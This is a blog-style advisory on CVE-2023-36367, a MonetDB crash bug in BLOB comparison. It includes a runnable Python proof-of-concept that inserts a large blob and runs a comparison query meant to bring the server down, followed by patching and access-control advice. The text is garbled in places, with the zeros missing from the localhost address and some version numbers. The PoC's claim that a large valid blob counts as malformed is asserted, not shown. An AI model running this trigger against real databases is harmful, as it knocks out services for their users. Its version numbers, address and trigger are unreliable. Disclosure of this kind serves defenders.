In recent months, database servers have become attractive targets for attackers aiming to bring down key services. One such vulnerability was found in MonetDB, a widely used open-source analytics database. Exploiting this bug is alarmingly simple and could interrupt anyone relying on MonetDB v11.45.17 or v11.46. with a single crafted SQL statement.

This article explains CVE-2023-36367, details the technical flaw, and provides proof-of-concept (PoC) code, along with steps for mitigation. If you run MonetDB, give this your attention.

What is CVE-2023-36367?

CVE-2023-36367 is a vulnerability in MonetDB’s BLOBcmp component. It allows an attacker to crash the database server using a specially crafted SQL query. Versions 11.45.17 and 11.46. are known to be affected.

Attack vector: Remote, through crafted SQL

- CVE link: NVD - CVE-2023-36367
- MonetDB Issue tracker: GitHub Issue #7621

How Does the Vulnerability Work?

The MonetDB server makes it possible to store and compare large binary objects (BLOBs). When comparing two BLOBs, the BLOBcmp function is called internally.

In the vulnerable server versions, this function does not handle certain unexpected input correctly, such as malformed or very large BLOBs. When such values are involved in a comparison (like using the = or < operator in a SQL query), a memory error or assertion is triggered, crashing the server process.

This means that any authenticated user — or, in some cases, anyone able to send SQL queries to the server — could reliably crash MonetDB.

How Simple is the Attack?

Running a single SQL command is enough. No need for privilege escalation, complex scripting, or special setup.

Proof-of-Concept (PoC) Exploit

Below we demonstrate a basic PoC in Python using the MonetDB Python connector (monetdb.sql). You can adapt this to any language with MonetDB support.

import monetdb.sql

# Connect to the MonetDB server
conn = monetdb.sql.connect(
    hostname='127...1',  # or your MonetDB server's address
    port=50000,
    username='monetdb',
    password='my_password',  # set your own
    database='demo'
)

cursor = conn.cursor()

# Create table with BLOB column
cursor.execute("CREATE TABLE IF NOT EXISTS test_blobs (id INT, data BLOB);")

# Insert several BLOB values, one being deliberately malformed or too large
try:
    # First, insert a normal BLOB
    cursor.execute("INSERT INTO test_blobs VALUES (1, decode('DEADBEEF', 'hex'));")
    
    # Now, insert a problematic value (simulate malformed BLOB)
    large_blob = b'A' * (10**7)  # 10 MB blob
    cursor.execute("INSERT INTO test_blobs VALUES (2, %s);", (large_blob,))
except Exception as e:
    print(f"Error inserting blobs: {e}")

# This is the crash trigger:
try:
    cursor.execute(
        "SELECT * FROM test_blobs WHERE data = (SELECT data FROM test_blobs WHERE id=2);"
    )
except Exception as e:
    print(f"Error triggering the bug: {e}")

cursor.close()
conn.close()

Result:
If running against an affected MonetDB server, executing the comparison may lead to an immediate segmentation fault or assertion failure, halting the database process.

- CVE-2023-36367 on NVD
- MonetDB Official Issue
- MonetDB Release Notes

Upgrade MonetDB!

This vulnerability has been patched in later versions. *(Check official downloads*).

Restrict SQL Access:

Only trusted users should be able to send SQL, especially if you are unable to update MonetDB right away.

Conclusion

CVE-2023-36367 demonstrates how a single overlooked check in binary data handling can threaten an entire database system. The bug is easy to trigger, invisible to the end-user, and requires only basic SQL permissions. Upgrading MonetDB remains the best defense.

Stay updated, practice access controls, and monitor your systems—especially with open-source databases that power business-critical apps. For more on staying safe and deep dives into database security issues, keep following security advisories and update your tech stack regularly.


*This article is exclusive to this platform. For further reading, check the references above or follow the MonetDB developer blog. If you have questions or experience with MonetDB vulnerabilities, share your story below!*

Timeline

Published on: 06/22/2023 14:15:00 UTC
Last modified on: 06/28/2023 18:49:00 UTC